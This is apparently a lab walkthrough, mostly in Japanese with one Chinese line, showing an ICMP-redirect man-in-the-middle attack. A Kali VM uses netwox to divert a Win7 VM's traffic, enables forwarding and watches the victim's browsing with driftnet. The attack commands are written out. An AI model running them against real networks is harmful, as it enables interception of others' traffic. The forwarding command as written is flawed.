1.環境への備え
攻撃マシン:kali仮想マシンのIPアドレス192.168.126.130ゲートウェイ192.168.126.2インストールnetwoxツール
ターゲットマシン:win7仮想マシンのIPアドレス192.168.126.131ゲートウェイ192.168.126.2
目的:ICMPリダイレクトメッセージをKALIを介してwin7に送信し、win7に元の192.168.126.2ゲートウェイが無効であると認識させ、データパケットが192.168.126.130を介して転送されるようにします。
2.プロセス操作
Win7は、攻撃前に通常どおりパブリックネットワークにアクセスできます
kaliで攻撃コマンドを実行する
sudo netwox 86 -f "host 192.168.126.131" -g "192.168.126.130" -i "192.168.126.2"
-f指攻击,host为靶机,-g为重定向地址,-i为原网关地址
win7では、wiresharkキャプチャを介して攻撃者が偽造したゲートウェイIDによって送信されたicmpリダイレクトメッセージを確認できます。
現時点では、win7仮想マシンはパブリックネットワークに正常にアクセスできません
kaliのコマンドを介してルーティングと転送をオンにする
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
kaliのコマンドによるオープントラフィックモニタリング
sudo driftnet -i eth0
現時点では、カリ監視ウィンドウでwin7アクセスWebサイトのデータの一部を確認できます。